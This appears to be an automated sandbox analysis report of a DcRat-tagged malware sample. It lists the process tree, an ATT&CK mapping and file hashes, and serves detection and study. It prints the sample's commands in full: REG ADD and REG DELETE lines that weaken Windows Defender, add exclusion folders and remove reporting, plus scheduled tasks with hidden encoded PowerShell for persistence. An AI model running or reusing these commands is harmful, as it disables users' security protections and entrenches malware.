C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BpmXCGkSTNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BpmXCGkSTNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KYhAKHECtWIvC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KYhAKHECtWIvC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJGvZSUioXRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJGvZSUioXRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wrndFtifU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wrndFtifU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIYCBlCeAeRQzmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIYCBlCeAeRQzmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KYhAKHECtWIvC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KYhAKHECtWIvC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJGvZSUioXRU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJGvZSUioXRU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wrndFtifU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wrndFtifU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIYCBlCeAeRQzmVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIYCBlCeAeRQzmVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UAGVHuYmYMGQZIzG /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UAGVHuYmYMGQZIzG /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjKsgEbjX" /SC once /ST 05:32:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjKsgEbjX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjKsgEbjX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hEOVRvlnWpJzMGvLw" /SC once /ST 03:34:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\oaLvSCW.exe\" cs /site_id 525403 /S" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hEOVRvlnWpJzMGvLw"2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\1781.dll1⤵
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\1781.dll2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\18BA.exeC:\Users\Admin\AppData\Local\Temp\18BA.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\18BA.exeC:\Users\Admin\AppData\Local\Temp\18BA.exe2⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\18BA.exe"C:\Users\Admin\AppData\Local\Temp\18BA.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\18BA.exe"C:\Users\Admin\AppData\Local\Temp\18BA.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\1AAF.exeC:\Users\Admin\AppData\Local\Temp\1AAF.exe1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1C37.exeC:\Users\Admin\AppData\Local\Temp\1C37.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\oaLvSCW.exeC:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\oaLvSCW.exe cs /site_id 525403 /S1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bfPiLOEoMHGtOUUyTU"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wrndFtifU\ADiKMh.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "CMIDffFQijmeSZd" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CMIDffFQijmeSZd2" /F /xml "C:\Program Files (x86)\wrndFtifU\cUXIbIj.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "CMIDffFQijmeSZd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CMIDffFQijmeSZd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FHrhfHAbDMoVgn" /F /xml "C:\Program Files (x86)\sJGvZSUioXRU2\CqqAbtH.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vGyDUozQLYzyN2" /F /xml "C:\ProgramData\LIYCBlCeAeRQzmVB\ACByebW.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LqDpKNkcwALTGagBI2" /F /xml "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\cweDAZY.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "admxdtfLtextKFmXkQj2" /F /xml "C:\Program Files (x86)\KYhAKHECtWIvC\OwrHoLH.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tzhoEZPqxAOMgijXP" /SC once /ST 04:04:37 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\bEhnnvWq\ZyvsAmQ.dll\",#1 /site_id 525403" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tzhoEZPqxAOMgijXP"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hEOVRvlnWpJzMGvLw"2⤵
-
C:\Users\Admin\AppData\Roaming\gtdcvscC:\Users\Admin\AppData\Roaming\gtdcvsc1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\itdcvscC:\Users\Admin\AppData\Roaming\itdcvsc1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12732 -s 3402⤵
- Program crash
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UAGVHuYmYMGQZIzG\bEhnnvWq\ZyvsAmQ.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UAGVHuYmYMGQZIzG\bEhnnvWq\ZyvsAmQ.dll",#1 /site_id 5254032⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tzhoEZPqxAOMgijXP"3⤵
-
C:\Users\Admin\AppData\Roaming\hudcvscC:\Users\Admin\AppData\Roaming\hudcvsc1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\hudcvscC:\Users\Admin\AppData\Roaming\hudcvsc2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 12732 -ip 127321⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
4Disabling Security Tools
1Virtualization/Sandbox Evasion
1File Permissions Modification
1Scripting
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oMPcKCByxz6c6aQOVuge8D1R.exe.logFilesize
42B
MD584cfdb4b995b1dbf543b26b86c863adc
SHA1d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce
-
C:\Users\Admin\AppData\Local\Temp\eTcHXU.OjDFilesize
1.4MB
MD541c8c2003f66e414a080e0a989788f2e
SHA120740ccc5f39d07b8b2efd5b320fedc35164de78
